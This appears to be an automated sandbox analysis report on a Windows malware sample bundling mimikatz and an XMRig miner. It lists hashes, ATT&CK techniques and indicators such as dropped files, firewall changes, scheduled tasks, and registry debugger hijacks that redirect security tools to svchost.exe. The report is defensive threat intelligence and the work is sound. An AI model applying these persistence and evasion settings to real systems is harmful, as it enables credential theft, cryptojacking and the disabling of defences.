mimikatz | 6f1e9522dd1dee1eb3bcd140f3d4cd61ab3cf7bfd8fdaabb8d1dec4834be3713

Analysis

max time kernel
150s
max time network
155s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
28/05/2024, 10:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-05-28_03d0de4cda4efd31f762aadf487b7aec_hacktools_icedid_mimikatz.exe
Size

9.0MB
MD5

03d0de4cda4efd31f762aadf487b7aec
SHA1

aeb5d2ef2ba2ba6a24ece954442d236caaabf872
SHA256

6f1e9522dd1dee1eb3bcd140f3d4cd61ab3cf7bfd8fdaabb8d1dec4834be3713
SHA512

a40209a7f055317ece2ce295bd0dcc2b8c186f131f37e73fb93a02e4a87e733b9a82cc3b2c43968fa7e3d04ef7dc50e4d6c38262b20cd9c9c018186c1f1683c5
SSDEEP

196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1

Score

10^/10

mimikatz xmrig discovery evasion execution miner persistence upx

Malware Config

Signatures

Disables service(s) 3 TTPs
evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
mimikatz

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 2524 created 2140	2524	ncnrnqz.exe	38

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Contacts a large (30386) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

Detects executables containing SQL queries to confidential data stores. Observed in infostealers 1 IoCs

resource	yara_rule
behavioral2/memory/3016-138-0x00007FF63A910000-0x00007FF63A9FE000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_SQLQuery_ConfidentialDataStore

UPX dump on OEP (original entry point) 43 IoCs

resource	yara_rule
behavioral2/memory/4740-0-0x0000000000400000-0x0000000000A9B000-memory.dmp	UPX
behavioral2/memory/4740-4-0x0000000000400000-0x0000000000A9B000-memory.dmp	UPX
behavioral2/files/0x00080000000235bb-6.dat	UPX
behavioral2/memory/4576-8-0x0000000000400000-0x0000000000A9B000-memory.dmp	UPX
behavioral2/files/0x00070000000235f9-134.dat	UPX
behavioral2/memory/3016-136-0x00007FF63A910000-0x00007FF63A9FE000-memory.dmp	UPX
behavioral2/memory/3016-138-0x00007FF63A910000-0x00007FF63A9FE000-memory.dmp	UPX
behavioral2/files/0x0007000000023603-141.dat	UPX
behavioral2/memory/3340-142-0x00007FF771380000-0x00007FF7713DB000-memory.dmp	UPX
behavioral2/memory/3340-150-0x00007FF771380000-0x00007FF7713DB000-memory.dmp	UPX
behavioral2/files/0x0007000000023602-163.dat	UPX
behavioral2/memory/4168-164-0x00007FF702680000-0x00007FF7027A0000-memory.dmp	UPX
behavioral2/memory/2416-171-0x00007FF771380000-0x00007FF7713DB000-memory.dmp	UPX
behavioral2/memory/4156-175-0x00007FF771380000-0x00007FF7713DB000-memory.dmp	UPX
behavioral2/memory/2296-179-0x00007FF771380000-0x00007FF7713DB000-memory.dmp	UPX
behavioral2/memory/4168-182-0x00007FF702680000-0x00007FF7027A0000-memory.dmp	UPX
behavioral2/memory/4256-184-0x00007FF771380000-0x00007FF7713DB000-memory.dmp	UPX
behavioral2/memory/3584-188-0x00007FF771380000-0x00007FF7713DB000-memory.dmp	UPX
behavioral2/memory/4428-192-0x00007FF771380000-0x00007FF7713DB000-memory.dmp	UPX
behavioral2/memory/4168-194-0x00007FF702680000-0x00007FF7027A0000-memory.dmp	UPX
behavioral2/memory/3064-197-0x00007FF771380000-0x00007FF7713DB000-memory.dmp	UPX
behavioral2/memory/4168-200-0x00007FF702680000-0x00007FF7027A0000-memory.dmp	UPX
behavioral2/memory/4892-202-0x00007FF771380000-0x00007FF7713DB000-memory.dmp	UPX
behavioral2/memory/1056-206-0x00007FF771380000-0x00007FF7713DB000-memory.dmp	UPX
behavioral2/memory/4532-210-0x00007FF771380000-0x00007FF7713DB000-memory.dmp	UPX
behavioral2/memory/4168-212-0x00007FF702680000-0x00007FF7027A0000-memory.dmp	UPX
behavioral2/memory/3228-215-0x00007FF771380000-0x00007FF7713DB000-memory.dmp	UPX
behavioral2/memory/4052-219-0x00007FF771380000-0x00007FF7713DB000-memory.dmp	UPX
behavioral2/memory/4168-221-0x00007FF702680000-0x00007FF7027A0000-memory.dmp	UPX
behavioral2/memory/2704-224-0x00007FF771380000-0x00007FF7713DB000-memory.dmp	UPX
behavioral2/memory/3028-228-0x00007FF771380000-0x00007FF7713DB000-memory.dmp	UPX
behavioral2/memory/4168-232-0x00007FF702680000-0x00007FF7027A0000-memory.dmp	UPX
behavioral2/memory/4260-234-0x00007FF771380000-0x00007FF7713DB000-memory.dmp	UPX
behavioral2/memory/4776-236-0x00007FF771380000-0x00007FF7713DB000-memory.dmp	UPX
behavioral2/memory/4728-238-0x00007FF771380000-0x00007FF7713DB000-memory.dmp	UPX
behavioral2/memory/6344-250-0x00007FF771380000-0x00007FF7713DB000-memory.dmp	UPX
behavioral2/memory/4168-251-0x00007FF702680000-0x00007FF7027A0000-memory.dmp	UPX
behavioral2/memory/3324-253-0x00007FF771380000-0x00007FF7713DB000-memory.dmp	UPX
behavioral2/memory/4168-254-0x00007FF702680000-0x00007FF7027A0000-memory.dmp	UPX
behavioral2/memory/4168-255-0x00007FF702680000-0x00007FF7027A0000-memory.dmp	UPX
behavioral2/memory/4168-257-0x00007FF702680000-0x00007FF7027A0000-memory.dmp	UPX
behavioral2/memory/4168-260-0x00007FF702680000-0x00007FF7027A0000-memory.dmp	UPX
behavioral2/memory/4168-262-0x00007FF702680000-0x00007FF7027A0000-memory.dmp	UPX

XMRig Miner payload 12 IoCs

miner

resource	yara_rule
behavioral2/memory/4168-182-0x00007FF702680000-0x00007FF7027A0000-memory.dmp	xmrig
behavioral2/memory/4168-194-0x00007FF702680000-0x00007FF7027A0000-memory.dmp	xmrig
behavioral2/memory/4168-200-0x00007FF702680000-0x00007FF7027A0000-memory.dmp	xmrig
behavioral2/memory/4168-212-0x00007FF702680000-0x00007FF7027A0000-memory.dmp	xmrig
behavioral2/memory/4168-221-0x00007FF702680000-0x00007FF7027A0000-memory.dmp	xmrig
behavioral2/memory/4168-232-0x00007FF702680000-0x00007FF7027A0000-memory.dmp	xmrig
behavioral2/memory/4168-251-0x00007FF702680000-0x00007FF7027A0000-memory.dmp	xmrig
behavioral2/memory/4168-254-0x00007FF702680000-0x00007FF7027A0000-memory.dmp	xmrig
behavioral2/memory/4168-255-0x00007FF702680000-0x00007FF7027A0000-memory.dmp	xmrig
behavioral2/memory/4168-257-0x00007FF702680000-0x00007FF7027A0000-memory.dmp	xmrig
behavioral2/memory/4168-260-0x00007FF702680000-0x00007FF7027A0000-memory.dmp	xmrig
behavioral2/memory/4168-262-0x00007FF702680000-0x00007FF7027A0000-memory.dmp	xmrig

mimikatz is an open source tool to dump credentials on Windows 5 IoCs

resource	yara_rule
behavioral2/memory/4740-0-0x0000000000400000-0x0000000000A9B000-memory.dmp	mimikatz
behavioral2/memory/4740-4-0x0000000000400000-0x0000000000A9B000-memory.dmp	mimikatz
behavioral2/files/0x00080000000235bb-6.dat	mimikatz
behavioral2/memory/4576-8-0x0000000000400000-0x0000000000A9B000-memory.dmp	mimikatz
behavioral2/memory/3016-138-0x00007FF63A910000-0x00007FF63A9FE000-memory.dmp	mimikatz

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	ncnrnqz.exe
File created	C:\Windows\system32\drivers\npf.sys	wpcap.exe
File created	C:\Windows\system32\drivers\etc\hosts	ncnrnqz.exe

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
2316	netsh.exe
4128	netsh.exe

Sets file execution options in registry 2 TTPs 40 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ncnrnqz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ncnrnqz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe	ncnrnqz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ncnrnqz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe	ncnrnqz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ncnrnqz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe	ncnrnqz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ncnrnqz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe	ncnrnqz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe	ncnrnqz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ncnrnqz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ncnrnqz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ncnrnqz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ncnrnqz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe	ncnrnqz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe	ncnrnqz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ncnrnqz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe	ncnrnqz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ncnrnqz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe	ncnrnqz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ncnrnqz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ncnrnqz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe	ncnrnqz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ncnrnqz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ncnrnqz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe	ncnrnqz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe	ncnrnqz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ncnrnqz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe	ncnrnqz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe	ncnrnqz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe	ncnrnqz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ncnrnqz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe	ncnrnqz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe	ncnrnqz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe	ncnrnqz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe	ncnrnqz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ncnrnqz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe	ncnrnqz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ncnrnqz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	ncnrnqz.exe

Executes dropped EXE 31 IoCs

pid	Process
4576	ncnrnqz.exe
2524	ncnrnqz.exe
3016	wpcap.exe
1924	illedyzmr.exe
3016	vfshost.exe
3340	mtlvznziz.exe
3792	xohudmc.exe
2008	yqiwma.exe
4168	jrvvrz.exe
2416	mtlvznziz.exe
4156	mtlvznziz.exe
2296	mtlvznziz.exe
4256	mtlvznziz.exe
3584	mtlvznziz.exe
4428	mtlvznziz.exe
3064	mtlvznziz.exe
4892	mtlvznziz.exe
1056	mtlvznziz.exe
4532	mtlvznziz.exe
3228	mtlvznziz.exe
4052	mtlvznziz.exe
2704	mtlvznziz.exe
3028	mtlvznziz.exe
4620	ncnrnqz.exe
4260	mtlvznziz.exe
4776	mtlvznziz.exe
4728	mtlvznziz.exe
4052	gepmrvmba.exe
6344	mtlvznziz.exe
3324	mtlvznziz.exe
6356	ncnrnqz.exe

Loads dropped DLL 12 IoCs

pid	Process
3016	wpcap.exe
3016	wpcap.exe
3016	wpcap.exe
3016	wpcap.exe
3016	wpcap.exe
3016	wpcap.exe
3016	wpcap.exe
3016	wpcap.exe
3016	wpcap.exe
1924	illedyzmr.exe
1924	illedyzmr.exe
1924	illedyzmr.exe

UPX packed file 39 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x00070000000235f9-134.dat	upx
behavioral2/memory/3016-136-0x00007FF63A910000-0x00007FF63A9FE000-memory.dmp	upx
behavioral2/memory/3016-138-0x00007FF63A910000-0x00007FF63A9FE000-memory.dmp	upx
behavioral2/files/0x0007000000023603-141.dat	upx
behavioral2/memory/3340-142-0x00007FF771380000-0x00007FF7713DB000-memory.dmp	upx
behavioral2/memory/3340-150-0x00007FF771380000-0x00007FF7713DB000-memory.dmp	upx
behavioral2/files/0x0007000000023602-163.dat	upx
behavioral2/memory/4168-164-0x00007FF702680000-0x00007FF7027A0000-memory.dmp	upx
behavioral2/memory/2416-171-0x00007FF771380000-0x00007FF7713DB000-memory.dmp	upx
behavioral2/memory/4156-175-0x00007FF771380000-0x00007FF7713DB000-memory.dmp	upx
behavioral2/memory/2296-179-0x00007FF771380000-0x00007FF7713DB000-memory.dmp	upx
behavioral2/memory/4168-182-0x00007FF702680000-0x00007FF7027A0000-memory.dmp	upx
behavioral2/memory/4256-184-0x00007FF771380000-0x00007FF7713DB000-memory.dmp	upx
behavioral2/memory/3584-188-0x00007FF771380000-0x00007FF7713DB000-memory.dmp	upx
behavioral2/memory/4428-192-0x00007FF771380000-0x00007FF7713DB000-memory.dmp	upx
behavioral2/memory/4168-194-0x00007FF702680000-0x00007FF7027A0000-memory.dmp	upx
behavioral2/memory/3064-197-0x00007FF771380000-0x00007FF7713DB000-memory.dmp	upx
behavioral2/memory/4168-200-0x00007FF702680000-0x00007FF7027A0000-memory.dmp	upx
behavioral2/memory/4892-202-0x00007FF771380000-0x00007FF7713DB000-memory.dmp	upx
behavioral2/memory/1056-206-0x00007FF771380000-0x00007FF7713DB000-memory.dmp	upx
behavioral2/memory/4532-210-0x00007FF771380000-0x00007FF7713DB000-memory.dmp	upx
behavioral2/memory/4168-212-0x00007FF702680000-0x00007FF7027A0000-memory.dmp	upx
behavioral2/memory/3228-215-0x00007FF771380000-0x00007FF7713DB000-memory.dmp	upx
behavioral2/memory/4052-219-0x00007FF771380000-0x00007FF7713DB000-memory.dmp	upx
behavioral2/memory/4168-221-0x00007FF702680000-0x00007FF7027A0000-memory.dmp	upx
behavioral2/memory/2704-224-0x00007FF771380000-0x00007FF7713DB000-memory.dmp	upx
behavioral2/memory/3028-228-0x00007FF771380000-0x00007FF7713DB000-memory.dmp	upx
behavioral2/memory/4168-232-0x00007FF702680000-0x00007FF7027A0000-memory.dmp	upx
behavioral2/memory/4260-234-0x00007FF771380000-0x00007FF7713DB000-memory.dmp	upx
behavioral2/memory/4776-236-0x00007FF771380000-0x00007FF7713DB000-memory.dmp	upx
behavioral2/memory/4728-238-0x00007FF771380000-0x00007FF7713DB000-memory.dmp	upx
behavioral2/memory/6344-250-0x00007FF771380000-0x00007FF7713DB000-memory.dmp	upx
behavioral2/memory/4168-251-0x00007FF702680000-0x00007FF7027A0000-memory.dmp	upx
behavioral2/memory/3324-253-0x00007FF771380000-0x00007FF7713DB000-memory.dmp	upx
behavioral2/memory/4168-254-0x00007FF702680000-0x00007FF7027A0000-memory.dmp	upx
behavioral2/memory/4168-255-0x00007FF702680000-0x00007FF7027A0000-memory.dmp	upx
behavioral2/memory/4168-257-0x00007FF702680000-0x00007FF7027A0000-memory.dmp	upx
behavioral2/memory/4168-260-0x00007FF702680000-0x00007FF7027A0000-memory.dmp	upx
behavioral2/memory/4168-262-0x00007FF702680000-0x00007FF7027A0000-memory.dmp	upx

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
79	ifconfig.me
80	ifconfig.me

Creates a Windows Service
persistence

Drops file in System32 directory 18 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData	ncnrnqz.exe
File created	C:\Windows\SysWOW64\pthreadVC.dll	wpcap.exe
File opened for modification	C:\Windows\SysWOW64\yqiwma.exe	xohudmc.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	ncnrnqz.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	ncnrnqz.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft	ncnrnqz.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache	ncnrnqz.exe
File created	C:\Windows\SysWOW64\Packet.dll	wpcap.exe
File created	C:\Windows\system32\wpcap.dll	wpcap.exe
File created	C:\Windows\system32\Packet.dll	wpcap.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2326C1864DE719190C396A6E8734D8B4	ncnrnqz.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2326C1864DE719190C396A6E8734D8B4	ncnrnqz.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751	ncnrnqz.exe
File created	C:\Windows\SysWOW64\wpcap.dll	wpcap.exe
File created	C:\Windows\SysWOW64\yqiwma.exe	xohudmc.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	ncnrnqz.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content	ncnrnqz.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751	ncnrnqz.exe

Drops file in Program Files directory 3 IoCs

description	ioc	Process
File created	C:\Program Files\WinPcap\uninstall.exe	wpcap.exe
File created	C:\Program Files\WinPcap\rpcapd.exe	wpcap.exe
File created	C:\Program Files\WinPcap\LICENSE	wpcap.exe

Drops file in Windows directory 60 IoCs

description	ioc	Process
File opened for modification	C:\Windows\kvialcmr\ncnrnqz.exe	2024-05-28_03d0de4cda4efd31f762aadf487b7aec_hacktools_icedid_mimikatz.exe
File created	C:\Windows\ctvlnlili\UnattendGC\specials\svschost.exe	ncnrnqz.exe
File created	C:\Windows\ctvlnlili\UnattendGC\specials\vimpcsvc.exe	ncnrnqz.exe
File created	C:\Windows\ctvlnlili\UnattendGC\svschost.xml	ncnrnqz.exe
File created	C:\Windows\ctvlnlili\UnattendGC\schoedcl.xml	ncnrnqz.exe
File created	C:\Windows\kvialcmr\svschost.xml	ncnrnqz.exe
File opened for modification	C:\Windows\kvialcmr\docmicfg.xml	ncnrnqz.exe
File opened for modification	C:\Windows\kvialcmr\schoedcl.xml	ncnrnqz.exe
File created	C:\Windows\ctvlnlili\rzvrtrlue\illedyzmr.exe	ncnrnqz.exe
File created	C:\Windows\ctvlnlili\UnattendGC\specials\ssleay32.dll	ncnrnqz.exe
File created	C:\Windows\ctvlnlili\rzvrtrlue\ip.txt	ncnrnqz.exe
File created	C:\Windows\ctvlnlili\UnattendGC\specials\spoolsrv.xml	ncnrnqz.exe
File created	C:\Windows\kvialcmr\spoolsrv.xml	ncnrnqz.exe
File created	C:\Windows\ctvlnlili\Corporate\mimilib.dll	ncnrnqz.exe
File created	C:\Windows\ctvlnlili\upbdrjv\swrpwe.exe	ncnrnqz.exe
File created	C:\Windows\ctvlnlili\UnattendGC\specials\tucl-1.dll	ncnrnqz.exe
File created	C:\Windows\ctvlnlili\UnattendGC\specials\vimpcsvc.xml	ncnrnqz.exe
File created	C:\Windows\ime\ncnrnqz.exe	ncnrnqz.exe
File created	C:\Windows\ctvlnlili\rzvrtrlue\wpcap.dll	ncnrnqz.exe
File created	C:\Windows\ctvlnlili\UnattendGC\specials\coli-0.dll	ncnrnqz.exe
File created	C:\Windows\ctvlnlili\UnattendGC\specials\libeay32.dll	ncnrnqz.exe
File created	C:\Windows\ctvlnlili\UnattendGC\specials\posh-0.dll	ncnrnqz.exe
File opened for modification	C:\Windows\ctvlnlili\rzvrtrlue\Result.txt	gepmrvmba.exe
File created	C:\Windows\ctvlnlili\UnattendGC\specials\xdvl-0.dll	ncnrnqz.exe
File created	C:\Windows\ctvlnlili\UnattendGC\specials\svschost.xml	ncnrnqz.exe
File opened for modification	C:\Windows\kvialcmr\spoolsrv.xml	ncnrnqz.exe
File opened for modification	C:\Windows\kvialcmr\vimpcsvc.xml	ncnrnqz.exe
File created	C:\Windows\ctvlnlili\rzvrtrlue\wpcap.exe	ncnrnqz.exe
File created	C:\Windows\ctvlnlili\UnattendGC\spoolsrv.xml	ncnrnqz.exe
File opened for modification	C:\Windows\kvialcmr\svschost.xml	ncnrnqz.exe
File created	C:\Windows\kvialcmr\ncnrnqz.exe	2024-05-28_03d0de4cda4efd31f762aadf487b7aec_hacktools_icedid_mimikatz.exe
File created	C:\Windows\ctvlnlili\UnattendGC\specials\cnli-1.dll	ncnrnqz.exe
File created	C:\Windows\kvialcmr\vimpcsvc.xml	ncnrnqz.exe
File opened for modification	C:\Windows\ctvlnlili\Corporate\log.txt	cmd.exe
File created	C:\Windows\kvialcmr\schoedcl.xml	ncnrnqz.exe
File created	C:\Windows\ctvlnlili\Corporate\mimidrv.sys	ncnrnqz.exe
File created	C:\Windows\ctvlnlili\rzvrtrlue\scan.bat	ncnrnqz.exe
File created	C:\Windows\ctvlnlili\UnattendGC\specials\trch-1.dll	ncnrnqz.exe
File created	C:\Windows\ctvlnlili\UnattendGC\specials\ucl.dll	ncnrnqz.exe
File created	C:\Windows\ctvlnlili\UnattendGC\specials\spoolsrv.exe	ncnrnqz.exe
File created	C:\Windows\ctvlnlili\UnattendGC\specials\docmicfg.xml	ncnrnqz.exe
File created	C:\Windows\ctvlnlili\UnattendGC\docmicfg.xml	ncnrnqz.exe
File created	C:\Windows\kvialcmr\docmicfg.xml	ncnrnqz.exe
File created	C:\Windows\ctvlnlili\rzvrtrlue\gepmrvmba.exe	ncnrnqz.exe
File created	C:\Windows\ctvlnlili\UnattendGC\specials\libxml2.dll	ncnrnqz.exe
File created	C:\Windows\ctvlnlili\UnattendGC\specials\zlib1.dll	ncnrnqz.exe
File created	C:\Windows\ctvlnlili\UnattendGC\vimpcsvc.xml	ncnrnqz.exe
File created	C:\Windows\ctvlnlili\rzvrtrlue\Packet.dll	ncnrnqz.exe
File opened for modification	C:\Windows\ctvlnlili\rzvrtrlue\Packet.dll	ncnrnqz.exe
File created	C:\Windows\ctvlnlili\UnattendGC\specials\crli-0.dll	ncnrnqz.exe
File created	C:\Windows\ctvlnlili\Corporate\vfshost.exe	ncnrnqz.exe
File created	C:\Windows\ctvlnlili\UnattendGC\specials\trfo-2.dll	ncnrnqz.exe
File created	C:\Windows\ctvlnlili\UnattendGC\specials\docmicfg.exe	ncnrnqz.exe
File created	C:\Windows\ctvlnlili\UnattendGC\specials\schoedcl.xml	ncnrnqz.exe
File created	C:\Windows\ctvlnlili\UnattendGC\Shellcode.ini	ncnrnqz.exe
File created	C:\Windows\ctvlnlili\UnattendGC\specials\exma-1.dll	ncnrnqz.exe
File created	C:\Windows\ctvlnlili\UnattendGC\specials\tibe-2.dll	ncnrnqz.exe
File created	C:\Windows\ctvlnlili\UnattendGC\specials\schoedcl.exe	ncnrnqz.exe
File created	C:\Windows\ctvlnlili\UnattendGC\AppCapture64.dll	ncnrnqz.exe
File created	C:\Windows\ctvlnlili\UnattendGC\AppCapture32.dll	ncnrnqz.exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1540	sc.exe
4352	sc.exe
1924	sc.exe
4700	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

NSIS installer 3 IoCs

installer

resource	yara_rule
behavioral2/files/0x00080000000235bb-6.dat	nsis_installer_2
behavioral2/files/0x00080000000232ff-15.dat	nsis_installer_1
behavioral2/files/0x00080000000232ff-15.dat	nsis_installer_2

Creates scheduled task(s) 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
4456	schtasks.exe
3372	schtasks.exe
3040	schtasks.exe

Modifies data under HKEY_USERS 49 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software	mtlvznziz.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals	mtlvznziz.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	mtlvznziz.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	mtlvznziz.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	ncnrnqz.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	mtlvznziz.exe
